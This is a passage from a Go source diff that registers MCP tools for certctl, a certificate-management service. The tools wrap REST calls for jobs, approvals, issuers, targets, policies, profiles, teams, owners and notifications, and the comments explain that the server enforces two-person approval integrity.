// RequiresApproval=true — registerApprovalTools, Phase A P1-28..P1-31).
|
||||||
|
//
|
||||||
|
// The approvalDecisionPayload struct sits alongside its callers
|
||||||
|
// (approve + reject MCP tools) so consumers reading the JSON shape
|
||||||
|
// don't have to chase across the file. It's intentionally unexported
|
||||||
|
// — the only public surface is the approve / reject tool args
|
||||||
|
// rendered by gomcp.AddTool.
|
||||||
|
|
||||||
|
// ── Jobs ────────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerJobTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_jobs",
|
||||||
|
Description: "List jobs with optional status and type filters. Job types: Issuance, Renewal, Deployment, Validation.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListJobsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.Type != "" {
|
||||||
|
q.Set("type", input.Type)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/jobs", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_job",
|
||||||
|
Description: "Get job details including type, status, attempts, errors, and timestamps.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/jobs/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_cancel_job",
|
||||||
|
Description: "Cancel a pending or running job.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/cancel", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_approve_job",
|
||||||
|
Description: "Approve a job that is in AwaitingApproval state.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/approve", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_reject_job",
|
||||||
|
Description: "Reject a job in AwaitingApproval state with an optional reason.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RejectJobInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Reason != "" {
|
||||||
|
body["reason"] = input.Reason
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/reject", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Approvals (Phase A — P1-28..P1-31) ──────────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. Operators using AI
|
||||||
|
// assistants for cert-renewal in regulated environments need natural-language
|
||||||
|
// approve/reject. The service layer enforces ErrApproveBySameActor (the
|
||||||
|
// requesting actor cannot self-approve) and the handler extracts the
|
||||||
|
// decided_by actor from auth.UserKey — so the MCP server's API key
|
||||||
|
// identity becomes the audit-trail actor automatically. Two-person integrity
|
||||||
|
// is preserved as long as the MCP server's key is distinct from the
|
||||||
|
// requesting actor's; the tool inputs deliberately omit any actor_id field
|
||||||
|
// to prevent client-side spoofing.
|
||||||
|
|
||||||
|
func registerApprovalTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_approvals",
|
||||||
|
Description: "List issuance approval requests (GET /api/v1/approvals). Optional state/certificate_id/requested_by filters narrow the returned set. Use state=pending to surface the operator-action queue.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListApprovalsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.State != "" {
|
||||||
|
q.Set("state", input.State)
|
||||||
|
}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
q.Set("certificate_id", input.CertificateID)
|
||||||
|
}
|
||||||
|
if input.RequestedBy != "" {
|
||||||
|
q.Set("requested_by", input.RequestedBy)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/approvals", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_approval",
|
||||||
|
Description: "Get a single approval request (GET /api/v1/approvals/{id}). Returns the full ApprovalRequest row — state, requesting actor, linked job, linked certificate.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/approvals/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_approve_request",
|
||||||
|
Description: "Approve an issuance request (POST /api/v1/approvals/{id}/approve). The decided_by actor is derived server-side from the authenticated API-key name; the two-person-integrity contract (ErrApproveBySameActor → HTTP 403) is enforced unconditionally. Optional `note` is captured in the audit row.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ApprovalDecisionInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := approvalDecisionPayload{Note: input.Note}
|
||||||
|
data, err := c.Post("/api/v1/approvals/"+input.ID+"/approve", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_reject_request",
|
||||||
|
Description: "Reject an issuance request (POST /api/v1/approvals/{id}/reject). Same RBAC contract as approve. Optional `note` is captured in the audit row.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ApprovalDecisionInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := approvalDecisionPayload{Note: input.Note}
|
||||||
|
data, err := c.Post("/api/v1/approvals/"+input.ID+"/reject", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// approvalDecisionPayload is the JSON request body sent by the approve and
// reject approval tools. It carries a single optional note; an empty note is
// left out of the encoded object. It mirrors the handler-side
// approvalDecisionBody.
type approvalDecisionPayload struct {
	Note string `json:"note,omitempty"`
}
|
||||||
@@ -0,0 +1,564 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the resource-management MCP tool domain — the
|
||||||
|
// configuration surface an operator builds out once and then
|
||||||
|
// references throughout cert issuance:
|
||||||
|
//
|
||||||
|
// - registerIssuerTools — issuer CRUD across the 12 issuer
|
||||||
|
// connectors (local CA, ACME upstream, ADCS / NDES, GlobalSign,
|
||||||
|
// Sectigo, DigiCert, Let's Encrypt, etc.).
|
||||||
|
// - registerTargetTools — deployment target CRUD across the 13
|
||||||
|
// target connectors (nginx / apache / haproxy / F5 / Palo Alto /
|
||||||
|
// IIS / WinCertStore / JavaKeystore / etc.).
|
||||||
|
// - registerPolicyTools — policy / policy-rule CRUD (issuance
|
||||||
|
// policies, key-strength rules, validity caps, EKU constraints).
|
||||||
|
// - registerProfileTools — certificate-profile CRUD (named
|
||||||
|
// bundles of "issuer + policy + targets + renewal cadence").
|
||||||
|
// - registerTeamTools / registerOwnerTools — ownership + RBAC
|
||||||
|
// scoping primitives (assign profiles to teams / owners).
|
||||||
|
// - registerNotificationTools — notification-channel CRUD across
|
||||||
|
// the 6 notifier connectors (email + webhook + chat + paging).
|
||||||
|
// - registerIntermediateCATools — Phase F P1-6..P1-9 (signed
|
||||||
|
// intermediate CA lifecycle: issue / sign / renew / list under
|
||||||
|
// the local issuer).
|
||||||
|
//
|
||||||
|
// Co-located because they're the "configure once, reference
|
||||||
|
// everywhere" half of the API surface; an LLM consumer reasoning
|
||||||
|
// about "what objects can the operator create + edit" sees them
|
||||||
|
// here together.
|
||||||
|
|
||||||
|
// ── Issuers ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerIssuerTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_issuers",
|
||||||
|
Description: "List all configured issuer connectors (Local CA, ACME, step-ca).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_issuer",
|
||||||
|
Description: "Get issuer details including type, configuration, and enabled status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_issuer",
|
||||||
|
Description: "Register a new issuer connector. Requires name and type (ACME, GenericCA, or StepCA).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateIssuerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/issuers", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_issuer",
|
||||||
|
Description: "Update an issuer connector's configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateIssuerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/issuers/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_issuer",
|
||||||
|
Description: "Delete an issuer connector.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/issuers/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_test_issuer",
|
||||||
|
Description: "Test connectivity to an issuer connector. Returns success or error details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/issuers/"+input.ID+"/test", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Targets ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerTargetTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_targets",
|
||||||
|
Description: "List all deployment targets (NGINX, Apache, HAProxy, F5, IIS).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/targets", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_target",
|
||||||
|
Description: "Get deployment target details including type, agent, and configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/targets/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_target",
|
||||||
|
Description: "Create a new deployment target. Requires name and type (NGINX, Apache, HAProxy, F5, IIS).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/targets", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_target",
|
||||||
|
Description: "Update a deployment target's configuration.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/targets/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_target",
|
||||||
|
Description: "Delete a deployment target.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/targets/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Policies ────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerPolicyTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_policies",
|
||||||
|
Description: "List all policy rules. Policy types: AllowedIssuers, AllowedDomains, RequiredMetadata, AllowedEnvironments, RenewalLeadTime.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/policies", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_policy",
|
||||||
|
Description: "Get policy rule details including type, configuration, and enabled status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/policies/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_policy",
|
||||||
|
Description: "Create a new policy rule. Requires name and type. Optional severity (Warning, Error, Critical) defaults to Warning.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreatePolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/policies", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_policy",
|
||||||
|
Description: "Update a policy rule's name, type, configuration, enabled status, or severity.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdatePolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/policies/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_policy",
|
||||||
|
Description: "Delete a policy rule.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/policies/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_policy_violations",
|
||||||
|
Description: "List violations for a specific policy. Shows affected certificates and severity (Warning, Error, Critical).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListViolationsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
data, err := c.Get("/api/v1/policies/"+input.ID+"/violations", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Profiles ────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerProfileTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_profiles",
|
||||||
|
Description: "List certificate enrollment profiles defining allowed key types, max TTL, and crypto constraints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/profiles", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_profile",
|
||||||
|
Description: "Get certificate profile details including allowed algorithms, max TTL, EKUs, and SAN patterns.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/profiles/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_profile",
|
||||||
|
Description: "Create a certificate enrollment profile. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateProfileInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/profiles", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_profile",
|
||||||
|
Description: "Update a certificate profile's constraints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateProfileInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/profiles/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_profile",
|
||||||
|
Description: "Delete a certificate profile.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/profiles/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Teams ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerTeamTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_teams",
|
||||||
|
Description: "List all teams for certificate ownership grouping.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/teams", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_team",
|
||||||
|
Description: "Get team details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/teams/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_team",
|
||||||
|
Description: "Create a new team. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateTeamInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/teams", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_team",
|
||||||
|
Description: "Update a team's name or description.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateTeamInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/teams/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_team",
|
||||||
|
Description: "Delete a team.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/teams/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Owners ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerOwnerTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_owners",
|
||||||
|
Description: "List all certificate owners with email and team assignment.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/owners", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_owner",
|
||||||
|
Description: "Get owner details including email and team.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/owners/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_owner",
|
||||||
|
Description: "Create a new certificate owner. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateOwnerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/owners", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_owner",
|
||||||
|
Description: "Update an owner's name, email, or team assignment.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateOwnerInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/owners/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_owner",
|
||||||
|
Description: "Delete a certificate owner.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/owners/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Notifications ───────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerNotificationTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_notifications",
|
||||||
|
Description: "List notification events (expiration warnings, renewal/deployment results, policy violations, revocations). Optional status filter supports the I-005 Dead letter tab (status=dead).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListNotificationsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/notifications", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_notification",
|
||||||
|
Description: "Get notification event details.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/notifications/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_mark_notification_read",
|
||||||
|
Description: "Mark a notification as read.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/notifications/"+input.ID+"/read", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-005: requeue a dead-letter notification. Flips status from 'dead'
|
||||||
|
// back to 'pending' and clears next_retry_at so the retry sweep picks
|
||||||
|
// the notification up on its next tick. Operator-triggered; the tool
|
||||||
|
